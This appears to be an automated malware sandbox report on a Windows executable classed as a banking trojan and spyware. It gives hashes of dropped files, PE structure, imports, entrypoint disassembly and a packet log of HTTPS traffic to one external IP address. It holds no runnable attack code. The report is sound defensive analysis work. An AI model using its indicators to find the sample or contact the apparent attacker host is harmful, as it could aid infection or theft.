                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:24
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:19
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.bank.troj.spyw.evad.winEXE@11/6@4/8
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 70.9% (good quality ratio 62.1%)
                            • Quality average: 65.9%
                            • Quality standard deviation: 34%
                            HCA Information:
                            • Successful, ratio: 96%
                            • Number of executed functions: 36
                            • Number of non-executed functions: 408
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Adjust boot time
                            • Enable AMSI
                            • Override analysis time to 240s for rundll32
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 23.50.105.163
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
• Not all processes were analyzed, report is missing behavior information
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
10:16:26 | API Interceptor | 4x Sleep call for process: file.exe modified
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                          Category:dropped
                                                          Size (bytes):49152
                                                          Entropy (8bit):0.7876734657715041
                                                          Encrypted:false
                                                          SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                          MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                          SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                          SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                          SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                          Malicious:true
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005
                                                          Category:dropped
                                                          Size (bytes):28672
                                                          Entropy (8bit):1.4755077381471955
                                                          Encrypted:false
                                                          SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                          MD5:DEE86123FE48584BA0CE07793E703560
                                                          SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                          SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                          SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                          Malicious:true
                                                          Process:C:\Users\user\Desktop\file.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):571230
                                                          Entropy (8bit):7.964579681710588
                                                          Encrypted:false
                                                          SSDEEP:12288:FV1e0UgkVT6ZT+3JCnoxgLSoCXwbePLJrH8fwpZ:FV1edgkV8T0CnoxX4ePLJTMwpZ
                                                          MD5:6F5100F5D8D2943C6501864C21C45542
                                                          SHA1:AD0BD5D65F09EA329D6ABB665EF74B7D13060EA5
                                                          SHA-256:6CBBC3FD7776BA8B5D2F4E6E33E510C7E71F56431500FE36DA1DA06CE9D8F177
                                                          SHA-512:E4F8287FC8EBCCC31A805E8C4CF71FEFE4445C283E853B175930C29A8B42079522EF35F1C478282CF10C248E4D6F2EBDAF1A7C231CDE75A7E84E76BAFCAA42D4
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\file.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):61440
                                                          Entropy (8bit):5.463972317214072
                                                          Encrypted:false
                                                          SSDEEP:768:WDKKrolwgA7W2cz1Pii4A1yZHtVtQg0eBU:KKPi2Fii4TrtQg0e
                                                          MD5:4D11BD6F3172584B3FDA0E9EFCAF0DDB
                                                          SHA1:0581C7F087F6538A1B6D4F05D928C1DF24236944
                                                          SHA-256:73314490C80E5EB09F586E12C1F035C44F11AEAA41D2F4B08ACA476132578930
                                                          SHA-512:6A023496E7EE03C2FF8E3BA445C7D7D5BFE6A1E1E1BAE5C17DCF41E78EDE84A166966579BF8CC7BE7450D2516F869713907775E863670B10EB60C092492D2D04
                                                          Malicious:false
                                                          Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):3444
                                                          Entropy (8bit):5.011954215267298
                                                          Encrypted:false
                                                          SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                                          MD5:B133A676D139032A27DE3D9619E70091
                                                          SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                                          SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                                          SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                                          Malicious:false
                                                          Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):3444
                                                          Entropy (8bit):5.011954215267298
                                                          Encrypted:false
                                                          SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                                          MD5:B133A676D139032A27DE3D9619E70091
                                                          SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                                          SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                                          SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                                          Malicious:false

File type: PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit): 6.028570145865521
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 73728
MD5: 338057ba65f786f4238be340d64daf08
SHA1: 6571744dbdf2150179e46fbf4de2ce8ba715cbf2
SHA256: bfb5009ee0d70c0e594a9f35fb56d541b91a9e7ab1f396ba01b986f1567e5bac
SHA512: 37e2a8a12dab1481bcb60fa8afdc9613cbff8e5d873754e3c6142e882d742c0f9ea19f1bac6ce1f6644b3e1c1022a7aab73105f53c2ccf4e9a71405fac89de34
SSDEEP: 768:f098UHbSVbERlm86g6yua4r+Z3KY0GHg37b8/mvl9sl5OliH2EyY7tAYMxR:fi8UYbE8w4N73E/mcz0atAYM/
TLSH: 4A734C1978438833E4424875C6D586C15BFE7D6333E760AFEFA81ACD5AA02D80676BF1
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!.v.!.v.!.v...). .v..N..5.v..N....v..N..z.v...+.&.v.!.w.F.v..N..#.v..N.. .v.Rich!.v.........PE..L....v.c...................
Icon Hash: 00828e8e8686b000
Entrypoint: 0x401a12
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows cui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:
Time Stamp: 0x631D76A4 [Sun Sep 11 05:48:20 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: a539b33d7ef3adce7c1bcaac987684e3
Instruction (entrypoint disassembly)
call 00007F573CBF78B7h
jmp 00007F573CBF4BE6h
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00410198h], eax
mov dword ptr [00410194h], ecx
mov dword ptr [00410190h], edx
mov dword ptr [0041018Ch], ebx
mov dword ptr [00410188h], esi
mov dword ptr [00410184h], edi
mov word ptr [004101B0h], ss
mov word ptr [004101A4h], cs
mov word ptr [00410180h], ds
mov word ptr [0041017Ch], es
mov word ptr [00410178h], fs
mov word ptr [00410174h], gs
pushfd
pop dword ptr [004101A8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0041019Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [004101A0h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [004101ACh], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [004100E8h], 00010001h
mov eax, dword ptr [004101A0h]
mov dword ptr [0041009Ch], eax
mov dword ptr [00410090h], C0000409h
mov dword ptr [00410094h], 00000001h
mov eax, dword ptr [0040F020h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0040F024h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [0040C058h]
Programming Language:
• [ASM] VS2005 build 50727
• [C++] VS2005 build 50727
• [ C ] VS2005 build 50727
• [LNK] VS2005 build 50727
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe234 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x12000 | 0xb0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xde20 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xc000 | 0x158 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xadcc | 0xb000 | False | 0.6025834517045454 | data | 6.690353602080156 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xc000 | 0x28e4 | 0x3000 | False | 0.3294270833333333 | data | 5.064876536458888 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xf000 | 0x21d4 | 0x2000 | False | 0.2056884765625 | data | 2.172494232850921 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x12000 | 0xb0 | 0x1000 | False | 0.040771484375 | data | 3.0557964218222446 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_MANIFEST | 0x12058 | 0x56 | ASCII text, with CRLF line terminators | English | United States
DLL | Import
KERNEL32.dll | MultiByteToWideChar, RaiseException, GetProcAddress, LoadLibraryA, GetEnvironmentVariableW, lstrcatW, LocalFree, GetThreadLocale, LCMapStringW, WideCharToMultiByte, LCMapStringA, GetStringTypeW, GetStringTypeA, GetLastError, HeapFree, GetVersionExA, HeapAlloc, GetProcessHeap, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapDestroy, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, GetModuleHandleA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, Sleep, HeapSize, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSection, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, InterlockedExchange, GetLocaleInfoA
USER32.dll | FindWindowA, wsprintfW
OLEAUT32.dll | SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayGetDim, VariantCopy, VariantClear, VariantInit, SysAllocStringByteLen, SysStringByteLen, SysAllocString, SysFreeString, SysAllocStringLen, GetErrorInfo
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 11, 2022 10:16:23.900734901 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:23.900787115 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:23.900912046 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:23.917438030 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:23.917479992 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:24.004534960 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:24.004710913 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:24.011389017 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:24.011408091 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:24.012128115 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:24.066070080 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:24.514329910 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:24.555376053 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:24.993163109 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:24.993236065 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:24.993271112 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:24.993307114 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:24.993339062 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:24.993371010 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:24.993380070 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:24.993406057 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:24.993434906 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:24.994070053 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:24.994113922 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:24.994147062 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:24.994172096 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:24.994179964 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:24.994193077 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:24.994231939 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:24.994266033 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:24.994277000 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.035010099 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.208559990 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.208641052 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.208684921 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.208723068 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.208731890 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.208759069 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.208775997 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.208817005 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.208853006 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.208862066 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.208893061 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.208926916 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.208934069 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.209172010 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.209209919 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.209218979 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.209280014 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.209314108 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.209320068 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.209331036 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.209364891 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.212543011 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.212610960 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.212652922 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.212688923 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.212697983 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.212721109 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.212739944 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.212768078 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.212810040 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.212811947 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.212826967 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.212866068 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.212877989 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.253787041 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.253815889 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.300635099 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.426436901 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.426525116 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.426567078 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.426644087 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.426690102 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.426697016 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.426727057 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.426753044 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.426779032 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.426789999 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.426800966 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.426841974 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.426857948 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.426866055 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.426891088 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.426903009 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.426932096 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.426935911 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.426981926 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.436301947 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.436398029 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.436454058 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.436466932 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.436486959 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.436499119 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.436520100 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.436534882 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.436559916 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.436609030 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.436633110 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.436680079 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.436692953 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.436728001 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.436741114 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.436754942 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.436767101 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.436793089 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.437781096 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.437822104 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.437879086 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.437891006 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.437911987 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.488059044 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.644522905 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.644551992 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.644634008 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.644694090 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.644706011 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.644718885 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.644742966 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.644762993 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.644790888 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.644819021 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.644819021 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.644839048 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.644869089 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.644921064 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.644973993 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.644983053 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.644999027 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.645029068 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.645036936 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.645054102 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.645064116 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.645113945 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.645119905 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.645155907 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.645931005 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.646008015 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.646069050 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.646081924 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.647249937 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.647340059 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.647367954 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.648230076 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.648297071 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.648308992 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.648346901 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.648405075 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
Sep 11, 2022 10:16:25.648412943 CEST | 443 | 49724 | 172.67.188.70 | 192.168.2.3
Sep 11, 2022 10:16:25.648464918 CEST | 49724 | 443 | 192.168.2.3 | 172.67.188.70
